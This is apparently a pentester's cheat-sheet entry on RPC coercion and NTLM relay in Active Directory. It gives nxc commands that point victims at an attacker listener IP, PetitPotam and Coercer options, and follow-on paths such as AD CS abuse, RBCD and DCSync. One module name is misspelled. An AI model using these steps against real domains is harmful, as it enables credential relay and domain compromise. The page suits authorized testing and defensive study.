RPC Coercion

Force a Windows host to authenticate to your NTLM relay listener. The authenticating identity is usually the machine account of the target (e.g., SERVER$), unless the coerced service runs under a domain service account.

• Typical targets:

  • DCs (for AD CS/LDAPS relay)
  • Servers
  • Workstations

• SMB relay to DCs is blocked by default (signing). Prefer LDAPS or AD CS as relay targets.

Tools

nxc

nxc smb coerce_plus module

nxc smb <smb_server_to_coerce> -u <username> -p <password> -d <domain> -M coerce_plus -o LISTENER=<attacker_ip>

Attempts coercion against a variety of RPC interfaces.

nxc smb petitpotam module

nxc smb <smb_server_to_coerce> -M petitopam

Tests for petitpotam vulnerability

Petitpotam

Attempts coercion against hardcoded EFSRPC interfaces

Coercer

coercer scan

Only attempts RPC interfaces advertised by EPM

coercer fuzz

Checks coercion against every known RPC interface

Attack Paths - If coercion is successful

• AD CS Template Abuse
  • See AD CS Abuse

    Check if any AD CS abuse exists from the context of the coerced victim's identity.

• Check for SMB share access across the environment, especially DCs.
• Resource Based Constrained Delegation (RBCD)

  If coerced request is relayed to LDAP/LDAP.

• DCSync